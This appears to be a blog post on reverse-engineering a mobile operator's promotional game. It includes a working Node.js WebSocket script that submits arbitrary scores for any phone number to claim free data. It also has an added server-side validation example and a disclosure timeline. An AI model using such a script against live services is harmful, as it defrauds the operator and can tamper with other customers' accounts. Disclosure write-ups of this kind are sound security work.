So my mobile operator had a campaign where you could get free mobile data just by playing a game similar to Flappy Bird. No catch, just play the game.
This is how the game looked:
When you lost, it would display the amount of data you would get. Note, if you first scored 1GB of data, and the next game 2GB of data, you would only get 2GB. The best high score was the only score that mattered.
Playing is boring, reverse engineering is more fun. Fire up ZAP and play the game a couple of times.
I noticed there was a WebSocket request to:
API endpoint: /existingcustomer/[phone-number]
Request data:
    {
        "phone": "phone-number",
        "score": 100.5 # Score = how much GB you want
    }
Wrote a quick Node.js program to let me get any high score I wanted.
    var prompt = require('prompt');
    var WebSocket = require('ws');
    var ws = new WebSocket("wss://xxx/.ws?v=5&ns=vimlagame");

    prompt.start();
    prompt.get(['phonenumber', 'score'], function (err, result) {
        // Log every message the server sends back
        ws.onmessage = function (event) {
            console.log("[Received] " + event.data);
        };

        var payload = {
            "t": "d",
            "d": {
                "r": 2, // Retry count
                "a": "p",
                "b": {
                    "p": "/existingcustomer/" + result.phonenumber,
                    "d": {
                        "phone": result.phonenumber,
                        "score": parseFloat(result.score)
                    }
                }
            }
        };

        var data = JSON.stringify(payload);
        console.log("[Sent] " + data);
        ws.send(data);

        // Wait for response, then exit
        setTimeout(function () {
            ws.close();
        }, 1500);
    });
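The request above works because the server stores whatever score the client sends. As an added example (not part of the original post and not Vimla's code), here is one way a backend could bound a submitted score before accepting it. It assumes the server issues a signed session token when a game starts; issueSession, validateSubmission, MAX_SCORE and MAX_RATE are hypothetical names and values.

```javascript
const crypto = require('crypto');

const SECRET = crypto.randomBytes(32); // server-only key (constructed for this example)
const MAX_SCORE = 5;                   // assumed campaign cap, in GB
const MAX_RATE = 0.01;                 // assumed max GB earnable per second of play

function sign(body) {
  return crypto.createHmac('sha256', SECRET).update(body).digest('hex');
}

// Issued by the server when a game starts; binds the phone number to a start time.
function issueSession(phone, now) {
  const body = `${phone}|${now}`;
  return `${body}|${sign(body)}`;
}

// Accept a score only if the token is authentic, belongs to the phone in the
// request path, and the score is achievable in the time actually played.
function validateSubmission(pathPhone, msg, token, now) {
  const parts = String(token).split('|');
  if (parts.length !== 3) return reject('bad token');
  const [phone, started, mac] = parts;
  const a = Buffer.from(mac, 'hex');
  const b = Buffer.from(sign(`${phone}|${started}`), 'hex');
  if (a.length !== b.length || !crypto.timingSafeEqual(a, b)) return reject('bad token');
  if (phone !== pathPhone || msg.phone !== pathPhone) return reject('phone mismatch');
  if (typeof msg.score !== 'number' || !Number.isFinite(msg.score) || msg.score < 0) {
    return reject('bad score');
  }
  if (msg.score > MAX_SCORE) return reject('over cap');
  const elapsed = (now - Number(started)) / 1000; // seconds since the game started
  if (elapsed <= 0 || msg.score > elapsed * MAX_RATE) return reject('implausible for play time');
  return { ok: true, reason: 'accepted' };
}

function reject(reason) {
  return { ok: false, reason };
}
```

A check like this only bounds what a client can claim; it does not prove the game was played. Tokens should also be single-use so an accepted session cannot be replayed.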
Disclosure Timeline
- 15 February - Reported to Vimla
- 18 February - Vimla responded and told me they were aware of people cheating.
Note: I did not abuse the script! I only wrote a small PoC for the Vimla team :)